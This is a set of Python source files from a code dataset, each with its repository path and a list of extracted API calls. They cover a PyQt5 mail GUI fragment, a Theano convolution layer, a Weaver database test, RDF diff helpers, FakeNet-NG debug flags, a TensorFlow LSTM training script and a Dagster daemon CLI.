QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((414, 12, 414, 87), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(414, 32, 414, 36): 'self', (414, 38, 414, 47): '"""Failed!"""', (414, 49, 414, 70): '"""信件寄出失敗!"""', (414, 72, 414, 86): 'QMessageBox.Ok'}, {}), "(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((437, 12, 437, 87), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(437, 32, 437, 36): 'self', (437, 38, 437, 47): '"""Failed!"""', (437, 49, 437, 70): '"""信件寄出失敗!"""', (437, 72, 437, 86): 'QMessageBox.Ok'}, {}), "(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((464, 18, 464, 54), 'mylibrary.genmail.gen_eml', 'gm.gen_eml', ({(464, 29, 464, 35): 'header', (464, 37, 464, 41): 'html', (464, 43, 464, 53): 'annex_file'}, {}), '(header, html, annex_file)', True, 'import mylibrary.genmail as gm\n'), ((464, 94, 464, 118), 'mylibrary.genmail.gen_eml', 
'gm.gen_eml', ({(464, 105, 464, 111): 'header', (464, 113, 464, 117): 'html'}, {}), '(header, html)', True, 'import mylibrary.genmail as gm\n'), ((468, 22, 468, 50), 'email.generator.Generator', 'generator.Generator', ({(468, 42, 468, 49): 'outfile'}, {}), '(outfile)', False, 'from email import generator\n'), ((473, 12, 473, 83), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(473, 32, 473, 36): 'self', (473, 38, 473, 47): '"""Failed!"""', (473, 49, 473, 66): '"""儲存失敗!"""', (473, 68, 473, 82): 'QMessageBox.Ok'}, {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((521, 31, 521, 110), 'PyQt5.QtWidgets.QFileDialog.getSaveFileName', 'QFileDialog.getSaveFileName', ({(521, 59, 521, 63): 'self', (521, 65, 521, 79): '"""另存為..."""', (521, 81, 521, 85): '"""./"""', (521, 87, 521, 109): '"""Excel Files (*.xlsx)"""'}, {}), "(self, '另存為...', './', 'Excel Files (*.xlsx)')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((525, 21, 525, 51), 'pandas.DataFrame', 'DataFrame', ({(525, 31, 525, 50): 'self.data_temp_logs'}, {}), '(self.data_temp_logs)', False, 'from pandas import DataFrame\n'), ((528, 16, 528, 92), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', ({(528, 40, 528, 44): 'self', (528, 46, 528, 56): '"""Success!"""', (528, 58, 528, 75): '"""儲存成功!"""', (528, 77, 528, 91): 'QMessageBox.Ok'}, {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((404, 130, 404, 136), 'server.sendmail.Smtp', 'Smtp', ({}, {}), '()', False, 'from server.sendmail import Smtp\n'), ((405, 141, 405, 151), 'server.database.Database', 'Database', ({}, {}), '()', False, 'from server.database import Database\n'), ((432, 20, 432, 112), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(432, 40, 432, 44): 'self', (432, 46, 432, 56): '"""Warning!"""', (432, 58, 432, 95): "('信件寄出成功!\\nWaning: ' + error)", (432, 97, 432, 111): 'QMessageBox.Ok'}, {}), "(self, 'Warning!', '信件寄出成功!\\nWaning: ' + error,\n QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((434, 20, 434, 100), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', ({(434, 44, 434, 48): 'self', (434, 50, 434, 60): '"""Success!"""', (434, 62, 434, 83): '"""信件寄出成功!"""', (434, 85, 434, 99): 'QMessageBox.Ok'}, {}), "(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((478, 34, 478, 45), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 
'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((530, 16, 530, 87), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(530, 36, 530, 40): 'self', (530, 42, 530, 51): '"""Failed!"""', (530, 53, 530, 70): '"""儲存失敗!"""', (530, 72, 530, 86): 'QMessageBox.Ok'}, {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((350, 38, 350, 49), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((352, 40, 352, 51), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((515, 46, 515, 67), 'PyQt5.QtGui.QColor', 'QColor', ({(515, 53, 515, 56): '(144)', (515, 58, 515, 61): '(182)', (515, 63, 515, 66): '(240)'}, {}), '(144, 182, 240)', False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\n'), ((334, 50, 334, 71), 'PyQt5.QtGui.QColor', 'QColor', ({(334, 57, 334, 60): '(144)', (334, 62, 334, 65): '(182)', (334, 67, 334, 70): '(240)'}, {}), '(144, 182, 240)', False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\n')]
317070/nntools
nntools/layers/corrmm.py
00e2865b1f8246254b3adc22c37989a8b77718d5
"""
GpuCorrMM-based convolutional layers
"""

import numpy as np
import theano
import theano.tensor as T
from theano.sandbox.cuda.basic_ops import gpu_contiguous
from theano.sandbox.cuda.blas import GpuCorrMM

from .. import init
from .. import nonlinearities

from . import base


# base class for all layers that rely on GpuCorrMM directly
class MMLayer(base.Layer):
    pass


class Conv2DMMLayer(MMLayer):
    def __init__(self, input_layer, num_filters, filter_size, strides=(1, 1),
                 border_mode=None, untie_biases=False, W=init.Uniform(),
                 b=init.Constant(0.), nonlinearity=nonlinearities.rectify,
                 pad=None, flip_filters=False):
        super(Conv2DMMLayer, self).__init__(input_layer)
        if nonlinearity is None:
            self.nonlinearity = nonlinearities.identity
        else:
            self.nonlinearity = nonlinearity

        self.num_filters = num_filters
        self.filter_size = filter_size
        self.strides = strides
        self.untie_biases = untie_biases
        self.flip_filters = flip_filters

        if border_mode is not None and pad is not None:
            raise RuntimeError("You cannot specify both 'border_mode' and 'pad'. To avoid ambiguity, please specify only one of them.")
        elif border_mode is None and pad is None:
            # no option specified, default to valid mode
            self.pad = (0, 0)
        elif border_mode is not None:
            if border_mode == 'valid':
                self.pad = (0, 0)
            elif border_mode == 'full':
                self.pad = (self.filter_size[0] - 1, self.filter_size[1] -1)
            elif border_mode == 'same':
                # only works for odd filter size, but the even filter size case is probably not worth supporting.
                self.pad = ((self.filter_size[0] - 1) // 2, (self.filter_size[1] - 1) // 2)
            else:
                raise RuntimeError("Unsupported border_mode for Conv2DMMLayer: %s" % border_mode)
        else:
            self.pad = pad

        self.W = self.create_param(W, self.get_W_shape())
        if b is None:
            self.b = None
        elif self.untie_biases:
            output_shape = self.get_output_shape()
            self.b = self.create_param(b, (num_filters, output_shape[2], output_shape[3]))
        else:
            self.b = self.create_param(b, (num_filters,))

        self.corr_mm_op = GpuCorrMM(subsample=self.strides, pad=self.pad)

    def get_W_shape(self):
        num_input_channels = self.input_layer.get_output_shape()[1]
        return (self.num_filters, num_input_channels, self.filter_size[0], self.filter_size[1])

    def get_params(self):
        return [self.W] + self.get_bias_params()

    def get_bias_params(self):
        return [self.b] if self.b is not None else []

    def get_output_shape_for(self, input_shape):
        batch_size = input_shape[0]
        input_width, input_height = input_shape[2:4]
        output_width = (input_width + 2*self.pad[0] - self.filter_size[0]) // self.strides[0] + 1
        output_height = (input_height + 2*self.pad[1] - self.filter_size[1]) // self.strides[1] + 1
        return (batch_size, self.num_filters, output_width, output_height)

    def get_output_for(self, input, *args, **kwargs):
        filters = self.W
        if self.flip_filters:
            filters = filters[:, :, ::-1, ::-1]  # flip width, height

        contiguous_filters = gpu_contiguous(filters)
        contiguous_input = gpu_contiguous(input)
        conved = self.corr_mm_op(contiguous_input, contiguous_filters)

        if self.b is None:
            activation = conved
        elif self.untie_biases:
            activation = conved + self.b.dimshuffle('x', 0, 1, 2)
        else:
            activation = conved + self.b.dimshuffle('x', 0, 'x', 'x')

        return self.nonlinearity(activation)
[((65, 26, 65, 73), 'theano.sandbox.cuda.blas.GpuCorrMM', 'GpuCorrMM', (), '', False, 'from theano.sandbox.cuda.blas import GpuCorrMM\n'), ((89, 29, 89, 52), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', ({(89, 44, 89, 51): 'filters'}, {}), '(filters)', False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\n'), ((90, 27, 90, 48), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', ({(90, 42, 90, 47): 'input'}, {}), '(input)', False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\n')]
dubey/weaver
tests/python/correctness/simple_test_aux_index.py
56a42fd2d0bbb14867ba792ca5461d16310a7387
#! /usr/bin/env python
#
# ===============================================================
# Description: Sanity check for fresh install.
#
# Created: 2014-08-12 16:42:52
#
# Author: Ayush Dubey, [email protected]
#
# Copyright (C) 2013, Cornell University, see the LICENSE file
# for licensing agreement
# ===============================================================
#

import sys

try:
    import weaver.client as client
except ImportError:
    import client

config_file=''

if len(sys.argv) > 1:
    config_file = sys.argv[1]

# create client object
c = client.Client('128.84.167.220', 2002, config_file)

# check aux index
assert c.aux_index()

# 1. create node for user ayush
c.begin_tx()
c.create_node('ayush')
c.set_node_properties({'type': 'user', 'age': '25'}, 'ayush')
c.end_tx()

# 2. create node for user egs
c.begin_tx()
c.create_node('egs')
c.set_node_property('type', 'user', 'egs')
c.end_tx()

# 3. ayush follows egs
c.begin_tx()
c.create_edge('ayush', 'egs', 'e1')
c.set_edge_property(edge='e1', key='type', value='follows')
c.create_edge('egs', 'ayush', 'e2')
c.set_edge_property(edge='e2', key='type', value='followed_by')
c.end_tx()

# 4. add a post and restrict visibility to followers only
c.begin_tx()
c.create_node('post')
c.set_node_property('type', 'post', 'post')
c.set_node_property('visibility', 'followers', 'post')
e3 = c.create_edge('egs', 'post')
c.set_edge_property(edge=e3, key='type', value='posted')
c.end_tx()

# 5. 'like' the post
c.begin_tx()
e4 = c.create_edge('post', 'ayush')
c.set_edge_property(edge=e4, key='type', value='liked_by')
c.end_tx()

# 6. list all the people who like egs's post
return_nodes = c.traverse('egs', {'type': 'user'}).out_edge({'type': 'posted'}).node({'type': 'post'}).out_edge({'type': 'liked_by'}).node({'type': 'user'}).execute()
assert len(return_nodes) == 1, 'traversal returned incorrect #nodes'
assert 'ayush' in return_nodes, 'traversal returned bad node handle'

# 7. try to create node with same handle as before
c.begin_tx()
c.create_node('ayush')
try:
    c.end_tx()
    assert False, 'create node passed'
except client.WeaverError:
    pass

# 8. try to create edge with same handle as before
c.begin_tx()
c.create_edge('ayush', 'egs', 'e1')
try:
    c.end_tx()
    assert False, 'create edge passed'
except client.WeaverError:
    pass

# 9. add auxiliary handles to nodes
c.begin_tx()
c.add_alias('ad688', 'ayush')
c.add_alias('el33th4x0r', 'egs')
c.end_tx()

# 10. list all the people who like egs's post
# this time with aliases instead of handles
return_nodes = c.traverse('el33th4x0r', {'type': 'user'}).out_edge({'type': 'posted'}).node({'type': 'post'}).out_edge({'type': 'liked_by'}).node({'type': 'user'}).execute()
assert len(return_nodes) == 1, 'traversal returned incorrect #nodes'
assert 'ayush' in return_nodes, 'traversal returned bad node handle'

# 11. get node and check it is valid
ad = c.get_node('ayush')
assert 'ad688' in ad.aliases
assert 'type' in ad.properties
assert 'user' in ad.properties['type']
assert 'age' in ad.properties
assert '25' in ad.properties['age']
assert 'e1' in ad.out_edges

print 'Correctly executed 11 transactions of varying complexity, pass simple_test.'
print 'Success, you have a working Weaver setup!'
[]
dmr/Ldtools
ldtools/helpers.py
9cc5474404a07bd4b7ad756d31306dfc37a39c7b
# -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals

try:
    unicode
except NameError:
    basestring = unicode = str  # Python 3

import logging

import rdflib
from rdflib import compare

logger = logging.getLogger("ldtools")

RESET_SEQ = "\033[0m"
COLOR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"

# The background is set with 40 plus the number of the color, and
# the foreground with 30
# These are the sequences need to get colored ouput
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)

COL = {
    'DEBUG': BLUE,
    'INFO': MAGENTA,
    'WARNING': YELLOW,
    'CRITICAL': YELLOW,
    'ERROR': RED}


def set_colored_logger(verbosity_level):
    class ColoredFormatter(logging.Formatter):
        def format(self, record):
            if record.levelname in COL:
                record.levelname = COLOR_SEQ % (
                    30 + COL[record.levelname]) + record.levelname + RESET_SEQ
                record.msg = unicode(record.msg)
                record.msg = COLOR_SEQ % (30 + GREEN) + record.msg + RESET_SEQ
            return logging.Formatter.format(self, record)

    formatter = ColoredFormatter(
        "%(asctime)s %(name)s %(funcName)s:%(lineno)d"
        " %(levelname)s: %(message)s")
    handler = logging.StreamHandler()
    handler.setFormatter(formatter)
    logger = logging.getLogger()
    logger.addHandler(handler)

    logger2 = logging.getLogger("ldtools._add_property")
    logger2.setLevel(logging.INFO)

    mapper = {1: logging.DEBUG, 2: logging.INFO, 3: logging.WARNING,
              4: logging.ERROR, 5: None}
    try:
        log_level = mapper[verbosity_level]
    except KeyError:
        log_level = mapper[2]
    if log_level:
        logger.setLevel(log_level)
    return logger


def my_graph_diff(graph1, graph2):
    """Compares graph2 to graph1 and highlights everything that changed.
    Colored if pygments available"""

    # quick fix for wrong type
    if not type(graph1) == type(graph2) == rdflib.Graph:
        if type(graph1) == rdflib.ConjunctiveGraph:
            g1contexts = list(graph1.contexts())
            assert len(g1contexts) == 1
            graph1 = g1contexts[0]
        if type(graph2) == rdflib.ConjunctiveGraph:
            g2contexts = list(graph2.contexts())
            assert len(g2contexts) == 1
            graph2 = g2contexts[0]

    # Return if both graphs are isomorphic
    iso1 = compare.to_isomorphic(graph1)
    iso2 = compare.to_isomorphic(graph2)

    if graph1.identifier == graph2.identifier:
        str_bit = u"The 2 '%s' Graphs" % graph1.identifier
    else:
        str_bit = (u"Graphs '%s' and '%s'"
                   % (graph1.identifier, graph2.identifier))

    if iso1 == iso2:
        logger.debug(u"%s are isomorphic" % str_bit)
        return

    print(u"Differences between %s." % str_bit)

    in_both, in_first, in_second = compare.graph_diff(iso1, iso2)

    def dump_nt_sorted(g):
        return sorted(g.serialize(format='nt').splitlines())

    sorted_first = dump_nt_sorted(in_first)
    sorted_second = dump_nt_sorted(in_second)

    import difflib

    diff = difflib.unified_diff(
        sorted_first,
        sorted_second,
        u'Original',
        u'Current',
        lineterm=''
    )

    try:
        from pygments import highlight
        from pygments.formatters import terminal
        from pygments.lexers import web

        lexer = web.XmlLexer()
        formatter = terminal.TerminalFormatter()
        print(highlight(u'\n'.join(diff), lexer, formatter))
    except ImportError:
        logger.info("Install pygments for colored diffs")
        print(u'\n'.join(diff))
    except UnicodeDecodeError:
        print(u"Only in first", unicode(sorted_first))
        print(u"Only in second", unicode(sorted_second))
[((13, 9, 13, 37), 'logging.getLogger', 'logging.getLogger', ({(13, 27, 13, 36): '"""ldtools"""'}, {}), "('ldtools')", False, 'import logging\n'), ((38, 14, 38, 37), 'logging.StreamHandler', 'logging.StreamHandler', ({}, {}), '()', False, 'import logging\n'), ((41, 13, 41, 32), 'logging.getLogger', 'logging.getLogger', ({}, {}), '()', False, 'import logging\n'), ((44, 14, 44, 56), 'logging.getLogger', 'logging.getLogger', ({(44, 32, 44, 55): '"""ldtools._add_property"""'}, {}), "('ldtools._add_property')", False, 'import logging\n'), ((77, 11, 77, 40), 'rdflib.compare.to_isomorphic', 'compare.to_isomorphic', ({(77, 33, 77, 39): 'graph1'}, {}), '(graph1)', False, 'from rdflib import compare\n'), ((78, 11, 78, 40), 'rdflib.compare.to_isomorphic', 'compare.to_isomorphic', ({(78, 33, 78, 39): 'graph2'}, {}), '(graph2)', False, 'from rdflib import compare\n'), ((92, 35, 92, 65), 'rdflib.compare.graph_diff', 'compare.graph_diff', ({(92, 54, 92, 58): 'iso1', (92, 60, 92, 64): 'iso2'}, {}), '(iso1, iso2)', False, 'from rdflib import compare\n'), ((102, 11, 108, 5), 'difflib.unified_diff', 'difflib.unified_diff', (), '', False, 'import difflib\n'), ((115, 16, 115, 30), 'pygments.lexers.web.XmlLexer', 'web.XmlLexer', ({}, {}), '()', False, 'from pygments.lexers import web\n'), ((116, 20, 116, 48), 'pygments.formatters.terminal.TerminalFormatter', 'terminal.TerminalFormatter', ({}, {}), '()', False, 'from pygments.formatters import terminal\n'), ((35, 19, 35, 57), 'logging.Formatter.format', 'logging.Formatter.format', ({(35, 44, 35, 48): 'self', (35, 50, 35, 56): 'record'}, {}), '(self, record)', False, 'import logging\n')]
AzzOnFire/flare-fakenet-ng
fakenet/diverters/debuglevels.py
bafd7e97b61cd43190dee7f1d2c3f4388488af76
# Debug print levels for fine-grained debug trace output control
DNFQUEUE = (1 << 0)   # netfilterqueue
DGENPKT = (1 << 1)    # Generic packet handling
DGENPKTV = (1 << 2)   # Generic packet handling with TCP analysis
DCB = (1 << 3)        # Packet handlign callbacks
DPROCFS = (1 << 4)    # procfs
DIPTBLS = (1 << 5)    # iptables
DNONLOC = (1 << 6)    # Nonlocal-destined datagrams
DDPF = (1 << 7)       # DPF (Dynamic Port Forwarding)
DDPFV = (1 << 8)      # DPF (Dynamic Port Forwarding) Verbose
DIPNAT = (1 << 9)     # IP redirection for nonlocal-destined datagrams
DMANGLE = (1 << 10)   # Packet mangling
DPCAP = (1 << 11)     # Pcap write logic
DIGN = (1 << 12)      # Packet redirect ignore conditions
DFTP = (1 << 13)      # FTP checks
DMISC = (1 << 27)     # Miscellaneous

DCOMP = 0x0fffffff    # Component mask
DFLAG = 0xf0000000    # Flag mask
DEVERY = 0x0fffffff   # Log everything, low verbosity
DEVERY2 = 0x8fffffff  # Log everything, complete verbosity

DLABELS = {
    DNFQUEUE: 'NFQUEUE',
    DGENPKT: 'GENPKT',
    DGENPKTV: 'GENPKTV',
    DCB: 'CB',
    DPROCFS: 'PROCFS',
    DIPTBLS: 'IPTABLES',
    DNONLOC: 'NONLOC',
    DDPF: 'DPF',
    DDPFV: 'DPFV',
    DIPNAT: 'IPNAT',
    DMANGLE: 'MANGLE',
    DPCAP: 'PCAP',
    DIGN: 'IGN',
    DFTP: 'FTP',
    DIGN | DFTP: 'IGN-FTP',
    DMISC: 'MISC',
}

DLABELS_INV = {v.upper(): k for k, v in DLABELS.items()}
[]
zhr1201/Multi-channel-speech-extraction-using-DNN
multichannel_lstm/train.py
4e48869e02b815a8b094acc9251ac6586fda350c
'''
Script for training the model
'''
import tensorflow as tf
import numpy as np
from input import BatchGenerator
from model import MultiRnn
import time
from datetime import datetime
import os
import matplotlib as mpl
mpl.use('Agg')
from matplotlib import pyplot as plt

sum_dir = 'sum'  # dir to write summary
train_dir = 'ckpt'  # dir to store the model
data_dir = 'train.pkl'  # dir of the data set

NEFF = 129  # effective FFT points
batch_size = 128
num_steps = 20
epochs = 2000
cell_type = 'NL_LSTM'
state_size = 256
output_size = 129
num_layer = 3
learning_rate = 0.0001

# build the model
rnn_model = MultiRnn(
    cell_type, state_size, output_size,
    batch_size, num_layer, learning_rate, num_steps)

# input data and referene data placeholder
in_data = tf.placeholder(
    tf.float32, [batch_size, num_steps, 2 * NEFF])
ref_data = tf.placeholder(
    tf.float32, [batch_size, num_steps, NEFF])

# make inference
init_state, final_state, inf_data = rnn_model.inference(in_data)

# compute loss
loss = rnn_model.loss(inf_data, ref_data)

saver = tf.train.Saver(tf.all_variables())

summary_op = tf.merge_all_summaries()

train_op = rnn_model.train(loss)

batch_gen = BatchGenerator(data_dir, batch_size, num_steps, epochs)

with tf.Session() as sess:
    summary_writer = tf.train.SummaryWriter(
        sum_dir, sess.graph)
    sess.run(tf.initialize_all_variables())
    steps = 0
    # generator for epoch data
    for idx, epoch in enumerate(batch_gen.gen_epochs()):
        training_state = None
        # generator for batch data
        for f_data, b_data, r_data, v_data in epoch:
            start_time = time.time()
            steps += 1
            in_data_np = np.concatenate((f_data, b_data), axis=2)
            if steps % 100 == 0:
                feed_dict = {in_data: in_data_np, ref_data: r_data}
                if training_state is not None:
                    feed_dict[init_state] = training_state
                # training the net
                loss_value, training_state, _, summary_str, test_inf = sess.run(
                    [loss, final_state, train_op, summary_op, inf_data], feed_dict)
                duration = time.time() - start_time
                sec_per_batch = float(duration)
                examples_per_sec = batch_size / duration
                format_str = (
                    '%s: step %d, loss = %.2f (%.1f examples/sec; %.3f '
                    'sec/batch, epoch %d)')
                print (format_str % (datetime.now(), steps, loss_value,
                                     examples_per_sec, sec_per_batch, idx))
                summary_writer.add_summary(summary_str, steps)
            else:
                feed_dict = {in_data: in_data_np, ref_data: r_data}
                if training_state is not None:
                    feed_dict[init_state] = training_state
                loss_value, training_state, _ = sess.run(
                    [loss, final_state, train_op], feed_dict)
            if steps % 10000 == 0:
                checkpoint_path = os.path.join(train_dir, 'model.ckpt')
                saver.save(sess, checkpoint_path, global_step=steps)
[((12, 0, 12, 14), 'matplotlib.use', 'mpl.use', ({(12, 8, 12, 13): '"""Agg"""'}, {}), "('Agg')", True, 'import matplotlib as mpl\n'), ((30, 12, 32, 52), 'model.MultiRnn', 'MultiRnn', ({(31, 4, 31, 13): 'cell_type', (31, 15, 31, 25): 'state_size', (31, 27, 31, 38): 'output_size', (32, 4, 32, 14): 'batch_size', (32, 16, 32, 25): 'num_layer', (32, 27, 32, 40): 'learning_rate', (32, 42, 32, 51): 'num_steps'}, {}), '(cell_type, state_size, output_size, batch_size, num_layer,\n learning_rate, num_steps)', False, 'from model import MultiRnn\n'), ((35, 10, 36, 50), 'tensorflow.placeholder', 'tf.placeholder', ({(36, 4, 36, 14): 'tf.float32', (36, 16, 36, 49): '[batch_size, num_steps, 2 * NEFF]'}, {}), '(tf.float32, [batch_size, num_steps, 2 * NEFF])', True, 'import tensorflow as tf\n'), ((37, 11, 38, 46), 'tensorflow.placeholder', 'tf.placeholder', ({(38, 4, 38, 14): 'tf.float32', (38, 16, 38, 45): '[batch_size, num_steps, NEFF]'}, {}), '(tf.float32, [batch_size, num_steps, NEFF])', True, 'import tensorflow as tf\n'), ((48, 13, 48, 37), 'tensorflow.merge_all_summaries', 'tf.merge_all_summaries', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((52, 12, 52, 67), 'input.BatchGenerator', 'BatchGenerator', ({(52, 27, 52, 35): 'data_dir', (52, 37, 52, 47): 'batch_size', (52, 49, 52, 58): 'num_steps', (52, 60, 52, 66): 'epochs'}, {}), '(data_dir, batch_size, num_steps, epochs)', False, 'from input import BatchGenerator\n'), ((46, 23, 46, 41), 'tensorflow.all_variables', 'tf.all_variables', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((54, 5, 54, 17), 'tensorflow.Session', 'tf.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((55, 21, 56, 28), 'tensorflow.train.SummaryWriter', 'tf.train.SummaryWriter', ({(56, 8, 56, 15): 'sum_dir', (56, 17, 56, 27): 'sess.graph'}, {}), '(sum_dir, sess.graph)', True, 'import tensorflow as tf\n'), ((57, 13, 57, 42), 'tensorflow.initialize_all_variables', 'tf.initialize_all_variables', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((64, 25, 64, 36), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((66, 25, 66, 65), 'numpy.concatenate', 'np.concatenate', (), '', True, 'import numpy as np\n'), ((92, 34, 92, 71), 'os.path.join', 'os.path.join', ({(92, 47, 92, 56): 'train_dir', (92, 58, 92, 70): '"""model.ckpt"""'}, {}), "(train_dir, 'model.ckpt')", False, 'import os\n'), ((74, 27, 74, 38), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((80, 37, 80, 51), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n')]
elsenorbw/dagster
python_modules/dagster/dagster/daemon/cli/__init__.py
b38822d7463812624dab0b2dae7c62e2a8d59828
import os
import sys
import threading
import time
import warnings
from contextlib import ExitStack

import click
import pendulum

from dagster import __version__
from dagster.core.instance import DagsterInstance
from dagster.daemon.controller import (
    DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS,
    DagsterDaemonController,
    all_daemons_healthy,
    all_daemons_live,
    daemon_controller_from_instance,
    debug_daemon_heartbeats,
    get_daemon_status,
)
from dagster.utils.interrupts import capture_interrupts, raise_interrupts_as


def _get_heartbeat_tolerance():
    tolerance = os.getenv(
        "DAGSTER_DAEMON_HEARTBEAT_TOLERANCE",
    )
    return int(tolerance) if tolerance else DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS


@click.command(
    name="run",
    help="Run any daemons configured on the DagsterInstance.",
)
def run_command():
    with capture_interrupts():
        with DagsterInstance.get() as instance:
            if instance.is_ephemeral:
                raise Exception(
                    "dagster-daemon can't run using an in-memory instance. Make sure "
                    "the DAGSTER_HOME environment variable has been set correctly and that "
                    "you have created a dagster.yaml file there."
                )

            with daemon_controller_from_instance(
                instance, heartbeat_tolerance_seconds=_get_heartbeat_tolerance()
            ) as controller:
                controller.check_daemon_loop()


@click.command(
    name="health-check",
    help="DEPRECATED, use liveness-check instead",
)
def health_check_command():
    warnings.warn("health-check is deprecated. Use liveness-check instead.")
    with DagsterInstance.get() as instance:
        if all_daemons_healthy(instance, heartbeat_tolerance_seconds=_get_heartbeat_tolerance()):
            click.echo("Daemon healthy")
        else:
            click.echo("Daemon not healthy")
            sys.exit(1)


@click.command(
    name="liveness-check",
    help="Check for recent heartbeats from the daemon.",
)
@click.option(
    "--heartbeat-tolerance",
    required=False,
    default=DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS,
    help="How long (in seconds) to allow a daemon to go without heartbeating before failing the dagster-daemon process.",
)
def liveness_check_command():
    with DagsterInstance.get() as instance:
        if all_daemons_live(instance, heartbeat_tolerance_seconds=_get_heartbeat_tolerance()):
            click.echo("Daemon live")
        else:
            click.echo("Daemon(s) not running")
            sys.exit(1)


@click.command(
    name="wipe",
    help="Wipe all heartbeats from storage.",
)
def wipe_command():
    with DagsterInstance.get() as instance:
        instance.wipe_daemon_heartbeats()
        click.echo("Daemon heartbeats wiped")


@click.command(
    name="heartbeat",
    help="Read and write a heartbeat",
)
def debug_heartbeat_command():
    with DagsterInstance.get() as instance:
        debug_daemon_heartbeats(instance)


@click.command(
    name="heartbeat-dump",
    help="Log all heartbeat statuses",
)
def debug_heartbeat_dump_command():
    with DagsterInstance.get() as instance:
        for daemon_type in instance.get_required_daemon_types():
            click.echo(get_daemon_status(instance, daemon_type))


@click.group(
    commands={"heartbeat": debug_heartbeat_command, "heartbeat-dump": debug_heartbeat_dump_command}
)
def debug_group():
